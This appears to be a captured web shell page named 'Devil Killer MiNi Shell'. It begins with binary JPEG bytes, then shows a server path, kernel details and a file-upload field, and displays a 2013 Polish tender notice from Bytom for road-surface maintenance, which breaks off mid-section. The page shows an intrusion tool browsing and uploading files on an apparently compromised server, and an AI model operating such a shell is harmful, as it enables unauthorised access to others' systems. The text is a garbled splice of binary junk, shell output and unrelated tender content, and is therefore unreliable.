JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130102/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130102/1874-N-2013.html

<p class="kh_header"><b>Bytom: Bieżące utrzymanie nawierzchni jezdni na terenie Gminy Bytom w 2013 roku w podziale na dwa zadania</b><br>
<b>Numer ogłoszenia: 1874 - 2013; data zamieszczenia: 02.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bytom - Miejski Zarząd Dróg i Mostów , ul. Smolenia 35, 41-902 Bytom, woj. śląskie, tel. 032 3969700, faks 032 3969702.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzdim.bytom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bieżące utrzymanie nawierzchni jezdni na terenie Gminy Bytom w 2013 roku w podziale na dwa zadania.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest bieżące utrzymanie nawierzchni jezdni na terenie Gminy Bytom w 2013 roku obejmujące niżej wymienione dwa zadania:
1/	Zadanie nr 1 - drogi krajowe, wojewódzkie i powiatowe;
2/	Zadanie nr 2 - drogi gminne i wewnętrzne.

2.	Przedmiot zamówienia opisany został szczegółowo w:
1/	Przedmiarach Robót;
2/	Specyfikacjach Technicznych Wykonania i Odbioru Robót Budowlanych (STWiORB);
3/	Założeniach do kalkulacji robót;
4/	Wzorze Umowy; 
stanowiących załączniki do niniejszej specyfikacji.

3.	Wykonawca winien udzielić co najmniej 36-miesięcznej gwarancji i rękojmi na wykonane roboty i zastosowane materiały, liczonej od dnia odbioru końcowego robót, potwierdzonego protokołem końcowym.

4.	Zamawiający przewiduje w trakcie realizacji zamówienia następujące rodzaje i orientacyjne (szacunkowe) ilości robót do wykonania:

	a/ dla Zadania nr 1 - drogi krajowe, wojewódzkie i powiatowe:
Lp.	Rodzaj robót	zakładana ilość robót	jednostka
1	Remont cząstkowy nawierzchni bitumicznej do 5m2 z ułożeniem taśmy bitumicznej  40 mm x 10 mm 	240	t
2	Mechaniczna rozbiórka nawierzchni bitumicznej grub. 10 cm	5 000	m2
3	Ręczne ułożenie nawierzchni bitumicznej grub. 5 cm (w-wa wiążąca)	600	m2
4	Ręczne ułożenie nawierzchni bitumicznej (w-wa ścieralna) grub. 5 cm łącznie z ułożeniem taśmy bitumicznej 40 mm x 10 mm 	600	m2
5	Mechaniczne ułożenie nawierzchni bitumicznej (w-wa wiążąca) grub. 5 cm	3 000	m2
6	Mechaniczne ułożenie nawierzchni bitumicznej (w-wa ścieralna) grub. 5 cm  z ułożeniem taśmy bitumicznej 40 mm x 10 mm	3 000	m2
7	Cięcie piłą mechaniczną nawierzchni bitumicznej grub. 6 - 10 cm	200	m 
8	Frezowanie nawierzchni bitumicznej o grub. 10 cm	12 000	m2
9	Wyrównanie nawierzchni masą asfaltową na zimno	40	t
10	Regulacja pionowa krat ściekowych ulicznych	20	szt
11	Regulacja pionowa włazów kanałowych	20	szt
12	Regulacja pionowa studzienek dla zaworów wodociągowych i gazowych	10	szt
13	Remont cząstkowy nawierzchni bitumicznej asfaltem lanym grysowym	140	t
14	Wyrównanie nawierzchni bitumicznej asfaltem lanym grysowym (bez wycinania)	50	t
15	Plantowanie poboczy	8 000	m2
16	Wypełnienie szczelin masą zalewową w nawierzchni bitumicznej	4 000	m
17	Rozebranie krawężnika betonowego 15 x 30 cm	800	m
18	Ułożenie nowego krawężnika betonowego 15 x 30 cm na ławie betonowej z oporem 	800	m
19	Przestawienie krawężników kamiennych 25 x 35 cm	200	m
20	Przestawienie krawężników betonowych 15 x 30 cm	200	m
21	Mechaniczne wykonanie koryta w gruncie kategorii IV-ej na głębokość 20 cm	1 300	m2
22	Mechaniczne wykonanie podbudowy z żużla stalowniczego (wielkopiecowego) o grubości w-wy 20 cm	1 300	m2
23	Ułożenie nawierzchni z kostki betonowej nowej grubości 8 cm szarej na podsypce cementowo-piaskowej	1 000	m2
24	Ułożenie nawierzchni z kostki betonowej nowej grubości 8 cm kolorowej na podsypce cementowo-piaskowej	300	m2
25	Rozebranie i ułożenie kostki kamiennej rzędowej od 14 cm do 19 cm - z odzysku	1 000	m2
26	Rozebranie i ułożenie kostki kamiennej nieregularnej do 14 cm - z odzysku	1 000	m2
27	Ażur. ułożenie nawierzchni z płyt betonowych ażurowych nowych grubości 10 cm	500	m2


	b/ dla Zadania nr 2 - drogi gminne i wewnętrzne:
Lp.	Rodzaj robót	zakładana ilość robót	jednostka
1	Remont cząstkowy nawierzchni bitumicznej z ułożeniem taśmy bitumicznej 40 mm x 10 mm 	10	t
2	Mechaniczna rozbiórka nawierzchni bitumicznej grub. 10 cm	400	m2
3	Ręczne ułożenie nawierzchni bitumicznej gr. 5 cm (w-wa wiążąca)	400	m2
4	Ręczne ułożenie nawierzchni bitumicznej (w-wa ścieralna) grub. 5 cm łącznie z ułożeniem taśmy bitumicznej 40 mm x 10 mm 	1 600	m2
5	Mechaniczne ułożenie nawierzchni bitumicznej (w-wa wiążąca) grub. 5 cm	4 000	m2
6	Mechaniczne ułożenie nawierzchni bitumicznej (w-wa ścieralna) grub. 5 cm łącznie z ułożeniem taśmy bitumicznej 40 mm x 10 mm 	8 000	m2
7	Cięcie piłą mechaniczną nawierzchni bitumicznej grub. 6 - 10 cm	400	m 
8	Frezowanie nawierzchni bitumicznej grub. 10 cm	10 000	m2
9	Wyrównanie nawierzchni masą asfaltową na zimno	10	t
10	Regulacja pionowa krat ściekowych ulicznych	20	szt
11	Regulacja pionowa włazów kanałowych	20	szt
12	Regulacja pionowa studzienek dla zaworów wodociągowych i gazowych	10	szt
13	Remont cząstkowy nawierzchni bitumicznej asfaltem lanym grysowym	50	t
14	Wyrównanie nawierzchni bitumicznej asfaltem lanym grysowym (bez wycinania)	12	t
15	Plantowanie poboczy	100	m2
16	Wypełnienie szczelin masą zalewową w nawierzchni bitumicznej	200	m
17	Rozebranie krawężnika betonowego 15 x 30 cm	200	m
18	Ułożenie nowego krawężnika betonowego 15 x 30 cm na ławie betonowej z oporem 	100	m
19	Przestawienie krawężników kamiennych 25 x 35 cm	200	m
20	Przestawienie krawężników betonowych 15 x 30 cm	200	m
21	Mechaniczne wykonanie koryta w gruncie kategorii IV-ej na głębokość 20 cm	200	m2
22	Mechaniczne wykonanie podbudowy z żużla stalowniczego (wielkopiecowego) o grubości w-wy 20 cm	200	m2
23	Ułożenie nawierzchni z kostki betonowej nowej grubości 8 cm szarej na podsypce cementowo-piaskowej	100	m2
24	Ułożenie nawierzchni z kostki betonowej nowej grubości 8 cm kolorowej na podsypce cementowo-piaskowej	20	m2
25	Rozebranie i ułożenie kostki kamiennej rzędowej od 14 cm do 19 cm - z odzysku	1 000	m2
26	Rozebranie i ułożenie kostki kamiennej nieregularnej do 14 cm - z odzysku	200	m2
27	Ażur. ułożenie nawierzchni z płyt betonowych ażurowych nowych grubości 10 cm	20	m2


5.	Podczas prowadzenia robót w pasie drogowym należy dokonać ich prawidłowego oznakowania, które musi być zgodne z załącznikiem do Rozporządzenia Ministra Infrastruktury z dnia 03.07.2003r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach (Dz. U. z 2003r,  Nr 220,  poz. 2181 z  późn. zm.).

6.	Podane w SIWZ i załącznikach do SIWZ ilości robót do wykonania są orientacyjne (szacunkowe), mają służyć  do porównania i oceny ofert  oraz dokonania wyboru najkorzystniejszej oferty. Faktyczne ilości mogą się różnić od ilości zakładanych (szacowanych), w zależności od występujących potrzeb Zamawiającego w okresie realizacji przedmiotu zamówienia. Wynagrodzenie wykonawcy stanowić będzie iloczyn faktycznie wykonanych robót i cen jednostkowych podanych w ofercie, do maksymalnego zobowiązania Zamawiającego wynikającego z umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, stanowiących nie więcej niż 50% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.32.20-7, 45.23.32.23-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający wymaga wniesienia wadium w następujących kwotach:
1/	83.000,00 zł (słownie: osiemdziesiąt trzy tysiące złotych ) - Zadanie nr 1,
2/	36.000,00 zł (słownie: trzydzieści sześć tysięcy złotych)    - Zadanie nr 2.
2.	Wadium może być wniesione w jednej lub kilku formach, o których mowa w art. 45 ust. 6 ustawy.
3.	W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy:
1/	nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji (zamawiającego - tj. Gmina Bytom - Miejski Zarząd Dróg i Mostów, 41-902 Bytom ul. Smolenia 35), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib,
2/	określenie wierzytelności, która ma być zabezpieczona gwarancją,  
3/	kwotę gwarancji,
4/	okres ważności gwarancji (nie może być krótszy niż okres związania ofertą),
5/	oświadczenie gwaranta, w którym zobowiązuje się on nieodwołalnie do bezwarunkowej zapłaty kwoty wadium na pierwsze pisemne żądanie zamawiającego zawierające oświadczenie, iż zaszła jedna z przesłanek zatrzymania wadium wymienionych w ustawie Prawo zamówień publicznych.
Powyższe zapisy stosuje się również do poręczeń wskazanych w art. 45 ust 6 pkt 2 i 5 ustawy
4.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek Zamawiającego: Getin Noble Bank O/Bytom: 43 1560 1049 0000 9030 0026 9731.  Do oferty należy dołączyć kopię polecenia przelewu.
5.	Wadium wnoszone w innych dopuszczalnych ustawą formach należy złożyć w oryginale w siedzibie zamawiającego - 41-902 Bytom, ul. Smolenia 35 (III piętro - pok. nr 25 - Dział Zamówień Publicznych), 
a kopię wadium dołączyć do oferty.  
6.	Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek zamawiającego potwierdzi wpływ środków na rachunek zamawiającego i uznanie środków na tym rachunku przed upływem terminu składania ofert.
7.	Zamawiający zwraca wadium  w przypadkach wymienionych w art. 46 ustawy. Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 1a ustawy.
8.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest wykazać, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał roboty remontowe nawierzchni jezdni dróg i ulic z mieszanek mineralno-bitumicznych na łączną wartość co najmniej:
- 2.500.000,00 zł brutto	- w odniesieniu do Zadania nr 1,
- 1.000.000,00 zł brutto	- w odniesieniu do Zadania nr 2,
i  przedłożyć dokumenty  potwierdzające, że roboty  te zostały  wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest wykazać, że dysponuje lub będzie dysponował co najmniej jedną osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej                      bez ograniczeń lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>3.	Jeżeli wykonawca będzie polegał na wiedzy i doświadczeniu lub osobach zdolnych do wykonania zamówienia, niezależnie od charakteru prawnego łączącego go z nimi stosunków, wówczas zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.

Zamawiający zwraca uwagę, że korzystając z zasobów innego podmiotu trzeciego w celu wykazania spełnienia warunków udziału w postępowaniu, wykonawca jest zobowiązany udowodnić zamawiającemu faktyczną możliwość dysponowania tymi zasobami, przedstawiając w tym celu wszelkie konieczne dokumenty.  W szczególności  może to być zobowiązanie podmiotu trzeciego. Zobowiązanie takie powinno szczegółowo określać: 
- podmiot trzeci udostępniający swoje zasoby,
- wykonawcę, na rzecz którego udostępniane są zasoby,
- nazwę zamówienia, dla realizacji którego udostępniane są zasoby, 
- zasoby, które podmiot trzeci udostępnia,
- czas, na jaki zasoby te są udostępnione,
- formę, w jakiej podmiot trzeci będzie uczestniczył w wykonywania zamówienia, jeżeli udostępnienie dotyczy zasobów wiedzy i doświadczenia.

Z uwagi na to, że  zasoby wiedzy i doświadczenia są nierozerwalnie związane z podmiotem je udostępniającym i  niemożliwe do samodzielnego obrotu, zobowiązanie powinno wprost wskazywać na formę, w jakiej podmiot trzeci będzie uczestniczył w wykonywania zamówienia, np. podwykonawstwo, doradztwo, współpraca w określonym zakresie  itp.

Zobowiązanie podmiotu trzeciego powinno być podpisane przez osobę/ osoby posiadające prawo reprezentowania podmiotu trzeciego zgodnie z zasadą reprezentacji  określoną we właściwym rejestrze lub innym dokumencie właściwym dla formy organizacyjnej tego podmiotu lub osobę/osoby posiadające prawo reprezentowania podmiotu trzeciego na podstawie odrębnego umocowania (pełnomocnictwa). Pełnomocnictwo to, w oryginale lub kopii potwierdzonej za zgodność z oryginałem przez wykonawcę lub dany podmiot trzeci, musi zostać załączone do oferty.
Zobowiązanie podmiotów trzecich do udostępnienia zasobów winno zostać złożone w oryginale lub w kopii poświadczonej za zgodność z oryginałem przez podmiot udostępniający te zasoby.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, za wyjątkiem niżej określonych możliwości i warunków dokonania takiej zmiany:
1/	Zamawiający przewiduje możliwość zmiany strony umowy tj. następstwo prawne wynikające z odrębnych przepisów, 
2/	Zamawiający przewiduje możliwość dokonania zmiany podwykonawcy i/lub części wykonywanego przez niego zakresu robót, bądź wprowadzenia podwykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzdim.bytom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Bytom - Miejski Zarząd Dróg i Mostów
41-902 Bytom ul. Smolenia 35
(III piętro, Dział Zamówień Publicznych MZDiM, pok. nr 25).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.01.2013 godzina 10:00, miejsce: Gmina Bytom - Miejski Zarząd Dróg i Mostów
41-902 Bytom ul. Smolenia 35
(III piętro, Dział Zamówień Publicznych MZDiM, pok. nr 25).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> 1/	Zadanie nr 1 - drogi krajowe, wojewódzkie i powiatowe;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest bieżące utrzymanie nawierzchni jezdni na terenie Gminy Bytom w 2013 roku 

2.	Przedmiot zamówienia opisany został szczegółowo w:
1/	Przedmiarach Robót;
2/	Specyfikacjach Technicznych Wykonania i Odbioru Robót Budowlanych (STWiORB);
3/	Założeniach do kalkulacji robót;
4/	Wzorze Umowy; 
stanowiących załączniki do niniejszej specyfikacji.

3.	Wykonawca winien udzielić co najmniej 36-miesięcznej gwarancji i rękojmi na wykonane roboty i zastosowane materiały, liczonej od dnia odbioru końcowego robót, potwierdzonego protokołem końcowym.

4.	Zamawiający przewiduje w trakcie realizacji zamówienia następujące rodzaje i orientacyjne (szacunkowe) ilości robót do wykonania:

